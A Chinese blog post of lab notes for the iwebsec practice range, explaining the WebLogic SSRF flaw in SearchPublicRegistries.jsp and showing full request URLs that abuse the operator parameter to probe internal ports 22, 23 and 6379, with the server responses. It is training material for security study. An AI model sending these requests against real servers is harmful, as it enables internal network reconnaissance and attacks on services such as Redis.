iwebsec靶场 中间件漏洞通关笔记1-Weblogic中间件漏洞

已于 2024-04-21 13:41:14 修改
阅读量1.4k 收藏 23
点赞数 21
分类专栏: iwebsec靶场 web渗透 网络安全 文章标签: 中间件 web安全 iwebsec weblogic中间件漏洞 SSRF漏洞
于 2024-04-21 13:33:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128092859
版权

目录

第01关 中间件漏洞

1.打开靶场

 2.Weblogic SSRF漏洞

(1)漏洞描述

(2)影响版本

(3)原理分析

3.渗透实战

(1)验证22端口

(2)验证23端口

(3)验证6379端口

第01关 中间件漏洞

通过实战iwebsec靶场的Weblogic SSRF中间件漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

1.打开靶场

http://iwebsec.com:81/middleware/01.phpicon-default.png?t=N7T8http://iwebsec.com:81/middleware/01.php

 2.Weblogic SSRF漏洞

(1)漏洞描述

weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

(2)影响版本

weblogic 10.0.2 – 10.3.6版本

(3)原理分析

通常来将,WebLogic服务开启的端口号是7001。

WebLogic的SSRF漏洞位于:7001/uddiexplorer/SearchPublicRegistries.jsp页面,如下所示

http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jspicon-default.png?t=N7T8http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp

这个漏洞可以通过operater这个可控参数来探测端口号是否开放

接下来进行测试,在页面中name中输入ljn,其他内容为空,点击search然后使用bp抓包

此时post的参数如下所示

operator=http%3A%2F%2Fwww-3.ibm.com%2Fservices%2Fuddi%2Finquiryapi&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

接下来将operater访问的url改为想要探测的端口号,

http%3A%2F%2Fwww-3.ibm.com%2Fservices%2Fuddi%2Finquiryapi

 比如说想探测22端口,那么就替换为http://127.0.0.1:22

operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

如果想探测redis服务的6379端口,那么就替换为http://127.0.0.1:6379

operator=http://127.0.0.1:6379&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

SSRF漏洞的渗透结果正如本关卡提示,如下所示

对于iwebsec服务而言,ip地址为192.168.71.152,服务端口号为7001,那么

访问 http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 返回which did not have a valid SOAP content-type: unknown/unknown.说明127.0.0.1主机的22端口开放

访问 :http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:23&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 返回Connection refused.说明127.0.0.1主机的23端口未开放

3.渗透实战

(1)验证22端口

http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search


如下所示,提示An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://127.0.0.1:22 which did not have a valid SOAP content-type: null.说明端口22已经开启

(2)验证23端口

http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:23&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

如下所示,提示 An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '23' 说明端口23未开启

(3)验证6379端口

http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:6379&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

如下所示,提示 An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Response contained no data 说明端口6379已开启

mooyuan天天
关注
  • 21
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
weblogic12c 漏洞 CVE-2018-2628补丁
07-23
2018最新weblogic反序列化漏洞补丁包 CVE-2018-2628补丁
iwebsec靶场SSRF)
果粒程
03-06 432
iwebsec靶场SSRF)
iwebsec靶场(sql注入)
果粒程
02-24 958
iwebsec靶场(sql注入)
iwebsec靶场 解析漏洞通关笔记1-Apache解析漏洞
最新发布
mooyuan的博客
04-28 1219
Apache服务器在解析一个文件时,当文件有多个以点分隔的后缀时,如果右边的后缀无法识别(不在mime.types内),则继续从右向左识别,那么我们请求这样一个文件:ljn.php.aaa,遇到第一个扩展名 aaa ->发现无法识别,于是从右向左 识别第二个扩展名php -> 发现后缀是php可以识别,于是交给php 处理。
iwebsec靶场(XXE漏洞
果粒程
03-07 804
iwebsec靶场(XXE漏洞
iwebsec靶场(命令执行)
果粒程
03-03 442
iwebsec靶场(命令执行)
iwebsec靶场(文件包含)
果粒程
03-02 1167
iwebsec靶场(文件包含)
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
1. **自动检测**:工具能自动化检测Weblogic服务器是否存在CVE-2017-10271漏洞,通过模拟攻击过程来验证服务器的易感性。 2. **漏洞评估**:提供详细的漏洞评估报告,包括服务器的版本信息、是否受漏洞影响以及可能...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞。 CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
iwebsec靶场搭建
mooyuan的博客
11-25 4509
iwebsec靶场可以通过两种方法进行渗透。第二种是本地搭建:目前可以通过两种方法搭建,一种是虚拟机绿色版解压即用,另外一种则是通过docker安装。
iwebsec靶场(文件上传)
果粒程
02-26 1400
iwebsec靶场(文件上传)
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场
网络安全领域___专研者.
04-24 2636
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
iwebsec靶场 反序列化关卡通关笔记1
mooyuan的博客
11-04 1194
iwebsec靶场反序列漏洞通关笔记
iwebsec靶场 SSRF关卡通关笔记
mooyuan的博客
11-03 1335
iwebsec靶场SSRF漏洞通关笔记
iwebsec靶场SQL注入-宽字节注入
qq_56041380的博客
03-28 450
开发者为了防止出现SQL注入攻击,将用户输入的数据用addslashes等函数进行过滤。addslashes等函数默认对单引号等字符进行转义,这样就可以避免注入。宽字节注入产生的原因是MYSQL在使用GBK编码的时候如果第一个字符的ASCII码大于128,会认为前面两个字符是汉字,会将前两个字符拼接为汉字,这样就可以将SQL语句闭合,造成宽字节注入。
iwebsec靶场-命令执行漏洞
dahege666的博客
03-31 871
命令执行漏洞
iwebsec靶场 文件包含漏洞通关笔记2-文件包含绕过(截断法)
mooyuan的博客
09-12 733
文件包含漏洞中,在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。文件上传的截断绕过通常源码包含如下字段,比如说传入的参数filename=phpinfo.txt,那么include时会为文件名加上 .html后缀,于是include的文件名就变为了phpinfo.txt.html,这样会导致文件包含漏洞利用出现失败。
常见的Java中间件漏洞
05-20
Java中间件是指在Java平台上运行的各种中间件软件,例如应用服务器、消息中间件、缓存服务器等。常见的Java中间件漏洞包括: 1. Tomcat漏洞:Tomcat是一个流行的Java应用服务器,在过去的几年中发现了多个严重漏洞,包括目录遍历漏洞和远程执行漏洞。 2. JBoss漏洞:JBoss是一个流行的开源应用服务器,它也曾经被发现了多个漏洞,包括远程代码执行漏洞和未授权访问漏洞。 3. WebLogic漏洞WebLogic是Oracle公司的一款Java应用服务器,2019年曝出了一个严重漏洞(CVE-2019-2725),攻击者可以通过发送特制的HTTP请求来执行恶意代码。 4. ActiveMQ漏洞:ActiveMQ是一个流行的开源消息中间件,曾经被发现过多个漏洞,包括拒绝服务漏洞和路径遍历漏洞。 5. Redis漏洞:Redis是一款流行的开源缓存服务器,曾经被发现过多个漏洞,包括远程代码执行漏洞和拒绝服务漏洞。 6. Elasticsearch漏洞:Elasticsearch是一款流行的开源搜索引擎,曾经被发现过多个漏洞,包括远程代码执行漏洞和未授权访问漏洞。 以上只是一些常见的Java中间件漏洞,实际上还有很多其他的漏洞类型和具体的漏洞实例。为了保障系统安全,需要及时更新中间件版本,以及加强配置和管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值